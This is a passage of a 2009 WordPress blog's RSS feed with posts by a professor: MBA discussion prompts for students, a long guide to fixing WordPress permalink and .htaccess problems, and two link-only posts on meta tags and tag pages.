				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.madhuriesingh.com%2Fhowtobuildsite%2Findex.php%2F2009%2Fimportance-of-mba-for-managers-today-batch-n-z%2F&amp;style=normal&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>Welcome to the first topic. </p>
<p>Please use the comment section to write your views.<br />
Do not forget to mention you blog address.<br />
Update your blog too.</p>
<p>Thanks</p>
<p>Professor Madhurie Singh</p>

]]></content:encoded>
			<wfw:commentRss>http://www.madhuriesingh.com/howtobuildsite/index.php/2009/importance-of-mba-for-managers-today-batch-n-z/feed/</wfw:commentRss>
		<slash:comments>21</slash:comments>
		</item>
		<item>
		<title>Importance of MBA for Managers Today &#8211; Batch A-M</title>
		<link>http://www.madhuriesingh.com/howtobuildsite/index.php/2009/importance-of-mba-for-managers-today-batch-a-m/</link>
		<comments>http://www.madhuriesingh.com/howtobuildsite/index.php/2009/importance-of-mba-for-managers-today-batch-a-m/#comments</comments>
		<pubDate>Sat, 24 Oct 2009 14:13:41 +0000</pubDate>
		<dc:creator>Madhurie Singh</dc:creator>
				<category><![CDATA[IT for Managers]]></category>

		<guid isPermaLink="false">http://www.madhuriesingh.com/howtobuildsite/?p=520</guid>
		<description><![CDATA[

			
				
			
		
<p>Welcome to the first topic. </p>
<p>Please use the comment section to write your views.
Do not forget to mention you blog address.
Update your blog too.</p>
<p>Thanks</p>
<p>Professor Madhurie Singh</p>

]]></description>
			<content:encoded><![CDATA[
<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.madhuriesingh.com%2Fhowtobuildsite%2Findex.php%2F2009%2Fimportance-of-mba-for-managers-today-batch-a-m%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.madhuriesingh.com%2Fhowtobuildsite%2Findex.php%2F2009%2Fimportance-of-mba-for-managers-today-batch-a-m%2F&amp;style=normal&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>Welcome to the first topic. </p>
<p>Please use the comment section to write your views.<br />
Do not forget to mention you blog address.<br />
Update your blog too.</p>
<p>Thanks</p>
<p>Professor Madhurie Singh</p>

]]></content:encoded>
			<wfw:commentRss>http://www.madhuriesingh.com/howtobuildsite/index.php/2009/importance-of-mba-for-managers-today-batch-a-m/feed/</wfw:commentRss>
		<slash:comments>18</slash:comments>
		</item>
		<item>
		<title>How to fix and solve Permalinks Problem using .Htaccess?</title>
		<link>http://www.madhuriesingh.com/howtobuildsite/index.php/2009/how-to-fix-and-solve-permalinks-problem-using-htaccess/</link>
		<comments>http://www.madhuriesingh.com/howtobuildsite/index.php/2009/how-to-fix-and-solve-permalinks-problem-using-htaccess/#comments</comments>
		<pubDate>Sun, 18 Oct 2009 13:01:08 +0000</pubDate>
		<dc:creator>Madhurie Singh</dc:creator>
				<category><![CDATA[Webpage Design]]></category>

		<guid isPermaLink="false">http://www.madhuriesingh.com/howtobuildsite/?p=433</guid>
		<description><![CDATA[

			
				
			
		
<p>Fixing Permalink Problems
Fixing .htaccess Generation Issues
If your installation of WordPress does not generate a .htaccess file or if it does not write the new rules onto your existing .htaccess file then there are a couple reasons that could be causing this. Work step by step and continue to the next step only if the previous [...]]]></description>
			<content:encoded><![CDATA[
<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.madhuriesingh.com%2Fhowtobuildsite%2Findex.php%2F2009%2Fhow-to-fix-and-solve-permalinks-problem-using-htaccess%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.madhuriesingh.com%2Fhowtobuildsite%2Findex.php%2F2009%2Fhow-to-fix-and-solve-permalinks-problem-using-htaccess%2F&amp;style=normal&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p><strong>Fixing Permalink Problems</strong><br />
<strong>Fixing .htaccess Generation Issues</strong><br />
If your installation of WordPress does not generate a .htaccess file or if it does not write the new rules onto your existing .htaccess file then there are a couple reasons that could be causing this. Work step by step and continue to the next step only if the previous step does not work.</p>
<p><strong>Change File Permissions:</strong> You must chmod the .htaccess file to 666 to edit it with the WordPress template editor, but this is not recommended, since if you do that, any user of your blog, who can edit templates will be able to edit it. You can change the permissions to 660 to make it server-writable, which again will have the same limitation.<br />
<strong> Server Blockage:</strong> Your host might have blocked the SERVER_SOFTWARE variable and this will cause WordPress&#8217; .htaccess generation to fail. If you are sure that your server is running Apache, you can force WordPress to believe that your server is running Apache by changing your wp-includes/vars.php file. Follow the steps below to implement these changes.<br />
Open the wp-includes/vars.php file using the built in file editor in your WordPress Admin panel.</p>
<p>To navigate to this panel, login to WordPress, click on &#8220;Manage&#8221;, then on &#8220;Files&#8221;, scroll to the bottom and type in wp-includes/vars.php into the text box under the &#8220;Other Files&#8221; title.<br />
Look for<br />
$is_apache = strstr($_SERVER['SERVER_SOFTWARE'], &#8216;Apache&#8217;) ? 1 : 0;<br />
and replace it with<br />
// $is_apache = strstr($_SERVER['SERVER_SOFTWARE'], &#8216;Apache&#8217;) ? 1 : 0;<br />
Add a new line under<br />
// $is_apache = strstr($_SERVER['SERVER_SOFTWARE'], &#8216;Apache&#8217;) ? 1 : 0;<br />
and type in<br />
$is_apache = 1;<br />
Users of XAMPP (Windows): Some versions of XAMPP do not enable mod_rewrite by default (though it is compiled in Apache). To enable it — and thus enable WordPress to write the .htaccess file needed to create pretty permalinks — you must open apache/conf/httpd.conf and uncomment the line LoadModule rewrite_module modules/mod_rewrite.so (i.e., delete the hash/pound sign at the front of the line).<br />
<strong> Permalinks, .htaccess, and MS Frontpage</strong><br />
A note about Microsoft Frontpage: many servers (shared and dedicated) maintained and built by various hosting companies come with mod_frontpage compiled with the apache build, and in many cases with the Frontpage Server Extensions installed, on each virtual server. This is more common than not, many/most binary distributions used in the server build process at most hosting companies these days include both mod_fronpage and the server extensions. Even if you&#8217;re not using Frontpage, because of the way that the extensions interact with apache (and the httpd.conf file) you&#8217;ll likely get something like a 500 error or blank white page when trying to view your WP install (although the admin panel may operate correctly) simply because extensions/mod_frontpage exist on your server.</p>
<p>Wordpress will operate correctly with the Frontpage Extensions installed, however permalinks will not function at all and ANY change to the permalinks section from the Wordpress admin interface will cause corruption of the Frontpage server extensions due to the addition of the mod_rewrite rules to the .htaccess file. There is however now a fix for this situation.</p>
<p>Quick Fixes, Frontpage or Permalinks<br />
Frontpage Extensions Fix: If you don&#8217;t care about permalinks and just want to make the MS Frontpage server extensions work again, simply edit your .htaccess file and remove the WordPress section with the rewrite rules.</p>
<p>To Use Permalinks: If you don&#8217;t care about Frontpage(but your hosting company has the extensions installed)</p>
<p>You will need to remove (or have your hosting company do so) the MS Frontpage server extensions, or simply edit the .htaccess file to removed all of the Frontpage Lines, leaving only the WordPress mod_rewrite code.</p>
<p>Using FrontPage AND Permalinks Together<br />
Finally, A solution.</p>
<p>There have been a number of threads on this issue in the support forums, and until now, no solution to the problem.</p>
<p>Normally, on a Unix server with the Microsoft FrontPage Server extensions installed WordPress works just fine and you are able to edit and publish pages (with Microsoft FrontPage) — until — you make a change to the permalinks (for example to the date based kind that I like /2005/04/etc). I often suggest that type of URI to folks asking about permalinks etc, as that is the method recommended by the w3c (see http://www.w3.org/Provider/Style/URI ).</p>
<p>Now, the problem is that FrontPage uses the .htaccess file (which the WordPress mod_rewrite rules must access) for its &#8220;publishing&#8221; and &#8220;web authoring&#8221; configuration. As soon as the WordPress mod_rewrite code is added to the file, two things happen — the permalinks don&#8217;t work and the Frontpage Server extensions become corrupt.</p>
<p>I have tried countless ways to get around this, including trying to use rewrite rules that &#8220;ignore&#8221; the %{HTTP_USERAGENT)% used by FrontPage, to using a second AccessFilename .wpaccess to the httpd.conf file, and a host of other things, and nothing worked to allow use of FrontPage and management and use of permalinks in WordPress at the same time.</p>
<p>The solution is actually simple, and I figured it out by accident.</p>
<p>If you are using, or wish to use FrontPage (or if your hosting package is pre-configured that way) along with WordPress, you&#8217;ll need to take the following simple steps on your server or have your hosting company do them for you.</p>
<p>Microsoft FrontPage creates the following directory</p>
<p>_vti_bin<br />
Nested within that it creates both<br />
_vti_adm<br />
and<br />
_vti_aut<br />
In addition to in your site (or WordPress) root folder in all of those directories you will find additional .htaccess files.</p>
<p>In all three of these directories AND in the root directory, at the top of ALL of the .htaccess files you simply need to add one line:</p>
<p>Options +FollowSymlinks<br />
There may or may not already be a line in each like</p>
<p>Options None<br />
Edit and save each .htaccess file and you&#8217;re done. Now everything works perfectly, including FrontPage, AND the permalinks of your choosing.</p>
<p>Long Permalinks<br />
When using extra long permalinks in email and posting in comments and chats, some long permalinks are &#8220;chopped off&#8221; or only the first section is actually recognized as a link and the end seen as text. Here is an example.</p>
<p>http://yourdomain.example.com/2005/10/4/article-about-joe-fred-sally-and-bog<br />
Can result in:</p>
<p>http://yourdomain.example.com/2005/10/4/article-about-joe-fred-sally-and-bog<br />
To click on the lower link, the user would get a 404 Page Not Found Error. If you have a tendency to use very long permalink post titles, take these steps to prevent this problem.</p>
<p>1. Check that you are indeed using Permalinks.</p>
<p>2. Edit your .htaccess file and add the following:</p>
<p>RewriteRule ^post/([0-9]+)?/?([0-9]+)?/?$ /index.php?p=$1&amp;page=$2 [QSA]<br />
3. Test it. Find a post&#8217;s ID number and type the following (with your information) in your browser and you should be redirected to your post:</p>
<p>http://yourdomain.example.com/post/(the ID #)<br />
It is also worth noting that most email software will not cut off URLs that have been delineated with angle-brackets (), so when pasting URLs into emails, you should write them as so:</p>
<p>Read my blog post at<br />
Additionally, some decent email clients offer a &#8220;preformat&#8221; option when composing plain-text emails. Using the &#8220;preformat&#8221; option when pasting links will force the email client not to insert linebreaks inside the links.</p>
<p>Fixing Other Issues<br />
If your .htaccess file is being generated correctly, but Permalinks still do not function, the following might be a problem. If problems persist, post a note in the WordPress Forum&#8217;s How To section.</p>
<p>AllowOverride Not Enabled<br />
Your server may not have the AllowOverride directive enabled. If the AllowOverride directive is set to None in your Apache httpd.config file, then .htaccess files are completely ignored. In this case, the server will not even attempt to read .htaccess files in the filesystem. When this directive is set to All, then any directive which has the .htaccess Context is allowed in .htaccess files. Example of enabled AllowOverride directive in httpd.config:</p>
<p>Options FollowSymLinks<br />
AllowOverride All</p>
<p>You may also have to enable the AllowOverride directive in your DocumentRoot:</p>
<p># &#8230; other directives&#8230;<br />
AllowOverride All</p>
<p>You may also have to change the AllowOverride settings for the site. This is surely the case when using Mac OS X Server, but might be likewise with other systems. Usually you can find the site configuration files in /etc/httpd/sites/<br />
If you don&#8217;t want to set AllowOverride to all (as it is above) then your AllowOverride list must include the FileInfo directive. You must restart your Apache server for any httpd.config file changes to take effect. For more information on which overrides are allowed, read about Apache Core Features.<br />
Paged Navigation Doesn&#8217;t Work<br />
Sometimes navigation to second (and subsequent) pages of posts does not work as expected. Your page may generate a link to a page with one of these URIs:<br />
http://www.example.com/page/2/<br />
http://www.example.name/category/categoryname/page/2/<br />
http://www.example/year/month/day/page/2/<br />
http://www.example/year/month/page/2/<br />
The result of clicking one of those links is that the page loads with all the surroundings (header, footer, sidebar), but instead of a page of posts, there is an error message: &#8220;Sorry, no posts match that criteria.&#8221;<br />
This is due to a glitch in the .htaccess file that WordPress generates. To fix it, delete the contents of your .htaccess file and re-create it.<br />
In the Control Panel, go to Manage &gt; Files (More Info on Editing Files)<br />
Click the link to your .htaccess file to edit its contents<br />
Copy the contents of the file and paste it to a text file in a text editor. This is a precaution in case your .htaccess file has manual entries for redirects, denials or other handy htaccess tricks<br />
Delete all contents from your .htaccess file and click the Update File button.<br />
In the Control Panel, go to Options &gt; Permalinks.<br />
Click the Update Permalink Structure button to freshly generate new rewrite rules for your permalinks.<br />
Test the results using a link that had previously broken.<br />
Add any manual htaccess entries back in your file (Place manual htaccess entries before the # BEGIN WordPress or after # END WordPress lines.)<br />
You may also perform similar steps by deleting the .htaccess files from the server, creating a fresh empty .htaccess file, changing its permissions to 666, and then in Options &gt; Permalinks generate a new set of htaccess rules by clicking the Update Permalinks Structure button.<br />
If that still doesn&#8217;t work, take a look at the WordPress support forums, specifically, this support post.<br />
Permalinks to pages don&#8217;t work<br />
If you&#8217;ve tried to navigate to a newly created Page and encounter an error, you likely need to update your Permalink structure. Remember, each time you add a new static Page to WordPress, new rules must be generated and updated to .htaccess (WordPress 1.X) or to the internal rewrites array (WordPress 2.X).<br />
Permalinks to Ultimate Tag Warrior tag pages don&#8217;t work<br />
If you get 404 errors on local tag URLs when using the UltimateTagWarrior plugin on WordPress 2.X, it&#8217;s because the internal rewrites generated by WordPress are being overly greedy and getting invoked before UTW&#8217;s rewrite rules have a chance. This usually occurs only when using a custom permalink structure (like /%postname%/). To fix it, either switch your Permalink structure to &#8220;Date and name based&#8221; or hack the UTW plugin to place the UTW rewrites at the top of the internal rewrites array. More Info on this.<br />
Permalinks work but no pages are returned<br />
Some versions of PHP 4.4.x and 5.x have a bug that causes mod_rewrite to fail when used with some versions of Apache 2.x. More details at http://bugs.php.net/bug.php?id=35096 and http://bugs.php.net/bug.php?id=35059.<br />
More Help<br />
If these steps do not work, search for your problem in the Codex, Troubleshooting, or in the Support Forum. As a last resort, file a bug report.</p>
<p>Tips and Tricks<br />
If you want to list your site in Google News, one of the requirements is to have at least three digit identifier at the end of every url.</p>
<p>This is easily accomplished using %postname%-%post_id% structure, which will append post ID to the end of URL so it becomes http://mysite.com/cooking-tips-tricks-344.</p>
<p>Having your posts end in .html<br />
There&#8217;s an easy way to having your posts end in a .html extension, using the structure tags above. Following the example used on properly terminating permalinks, you could have a page like http://yoursite.com/2006/01/01/happy-newyear.html with this rule:</p>
<p>/%year%/%monthnum%/%day%/%postname%.html<br />
Note that this does not generate static .html files. It only adds the .html extension, pages are still being dynamically generated. The SEO benefit to this is debatable, but it can be useful should you need to migrate away from WordPress, since the pages can easily be made static and retain their URL structure.</p>
<p>WordPress versions prior to 2.3 lacked canonical URLs, making .html something very beneficial to add (forcing the URL to be canonical). Now it only provides limited, if any SEO benefits (see External Resources for further analysis).</p>
<p>Avoiding interpretation as an archive link<br />
Note that even though one might never make more than one posting a day, and thus wishes to use e.g., %year%%monthnum%%day%, links so generated will however be interpreted as the archive of all posts for that day. One needs at least %year%%monthnum%%day%%hour% to target an individual post.</p>
<p>See Also<br />
Linking Posts Pages and Categories for how to link from one article to another<br />
External Resources<br />
Optimize WordPress Permalinks<br />
Beautify your URLs with Permalinks<br />
How to Configure WordPress to Create Search Engine Friendly URLs for Permalinks<br />
The htaccess Rules for all WordPress Permalinks<br />
URL Rewriting Tutorial — the whats, hows and wherefores.<br />
Boost Search Engine Optimisation (SEO) using Permalinks<br />
Understanding WordPress Permalinks<br />
WordPress Permalink Canonicalization using htaccess<br />
Customize and Optimize Your Dated WordPress Permalinks<br />
Clean Permalinks for IIS using .htaccess<br />
The Easiest Lighttpd Rewrite Rule<br />
URL rewriting with lighttpd<br />
Permalinks with Lighttpd — using mod_magnet; works on 1.4.2+</p>

]]></content:encoded>
			<wfw:commentRss>http://www.madhuriesingh.com/howtobuildsite/index.php/2009/how-to-fix-and-solve-permalinks-problem-using-htaccess/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to create and use HTML Meta Tags, Title Tag, Favicon in wordpress.</title>
		<link>http://www.madhuriesingh.com/howtobuildsite/index.php/2009/how-to-create-and-use-html-meta-tags-title-tag-favicon-in-wordpress/</link>
		<comments>http://www.madhuriesingh.com/howtobuildsite/index.php/2009/how-to-create-and-use-html-meta-tags-title-tag-favicon-in-wordpress/#comments</comments>
		<pubDate>Sun, 18 Oct 2009 12:59:19 +0000</pubDate>
		<dc:creator>Madhurie Singh</dc:creator>
				<category><![CDATA[Webpage Design]]></category>

		<guid isPermaLink="false">http://www.madhuriesingh.com/howtobuildsite/?p=431</guid>
		<description><![CDATA[

			
				
			
		
<p>http://searchenginewatch.com/2167931</p>

]]></description>
			<content:encoded><![CDATA[
<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.madhuriesingh.com%2Fhowtobuildsite%2Findex.php%2F2009%2Fhow-to-create-and-use-html-meta-tags-title-tag-favicon-in-wordpress%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.madhuriesingh.com%2Fhowtobuildsite%2Findex.php%2F2009%2Fhow-to-create-and-use-html-meta-tags-title-tag-favicon-in-wordpress%2F&amp;style=normal&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>http://searchenginewatch.com/2167931</p>

]]></content:encoded>
			<wfw:commentRss>http://www.madhuriesingh.com/howtobuildsite/index.php/2009/how-to-create-and-use-html-meta-tags-title-tag-favicon-in-wordpress/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to create and add a Tag Page in Wordpress.</title>
		<link>http://www.madhuriesingh.com/howtobuildsite/index.php/2009/how-to-create-and-add-a-tag-page-in-wordpress/</link>
		<comments>http://www.madhuriesingh.com/howtobuildsite/index.php/2009/how-to-create-and-add-a-tag-page-in-wordpress/#comments</comments>
		<pubDate>Sun, 18 Oct 2009 12:56:11 +0000</pubDate>
		<dc:creator>Madhurie Singh</dc:creator>
				<category><![CDATA[Webpage Design]]></category>

		<guid isPermaLink="false">http://www.madhuriesingh.com/howtobuildsite/?p=428</guid>
		<description><![CDATA[

			
				
			
		
<p>In trying to find solution for my 404 Link broken Error, I found this good site.</p>
<p>http://wpguy.com/articles/how-to-make-a-tag-cloud-page/</p>

]]></description>
			<content:encoded><![CDATA[
<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.madhuriesingh.com%2Fhowtobuildsite%2Findex.php%2F2009%2Fhow-to-create-and-add-a-tag-page-in-wordpress%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.madhuriesingh.com%2Fhowtobuildsite%2Findex.php%2F2009%2Fhow-to-create-and-add-a-tag-page-in-wordpress%2F&amp;style=normal&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>In trying to find solution for my 404 Link broken Error, I found this good site.</p>
<p>http://wpguy.com/articles/how-to-make-a-tag-cloud-page/</p>

]]></content:encoded>
			<wfw:commentRss>http://www.madhuriesingh.com/howtobuildsite/index.php/2009/how-to-create-and-add-a-tag-page-in-wordpress/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

